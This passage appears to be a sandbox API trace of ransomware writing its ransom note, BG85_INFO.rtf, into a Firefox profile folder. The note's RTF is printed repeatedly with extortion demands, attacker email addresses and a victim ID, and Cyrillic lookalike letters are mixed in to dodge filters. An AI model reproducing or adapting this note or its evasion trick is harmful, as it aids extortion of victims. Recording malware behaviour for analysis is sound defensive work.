\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\nÔ48Õ>*c\x98¿PËxf]ê\x8ac¤\x1eîJ\x09ÇY5ø}\"\x1f¯·èE\x1e\x1b\x9a®*À\x83èlÁÝ9\x99\x91i\x09\x9dÃø\x06Öå¥{\x9cÚ\x14\\\x7fÀï\x1b\x02\x03¬s\räç\x7f\x99õ c§¾\x9fÞ\x8bØfì¯ÜVËÞÏIîO¾@,nåèJê\x97\x03w\x07Ôr\x87\x13­4×¾\x80B=ÿƨ­DĨÊƶ\x19bonv|ßu5±\x12Qe\x7f\x9a\x8f\x02RùÿÙ¡ÃÀkI>o Ø\x95&Fk\x09²bß\x8a¨n*N\x0c-¶\x07º3_¨42>\x9b§g¶r ê\x91\x02Çy\x98\x1f\x99f±{\r9£", lpUsedDefaultChar=0x0) returned 7247 [0066.728] WriteFile (in: hFile=0x1cc, lpBuffer=0x2668a38*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x2668a38*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0066.729] CloseHandle (hObject=0x1cc) returned 1 [0066.729] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\OfflineCache\\BG85_INFO.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\offlinecache\\bg85_info.rtf")) returned 0xffffffff [0066.729] GetLastError () returned 0x2 [0066.729] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\OfflineCache\\BG85_INFO.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\offlinecache\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0066.730] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0066.730] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct 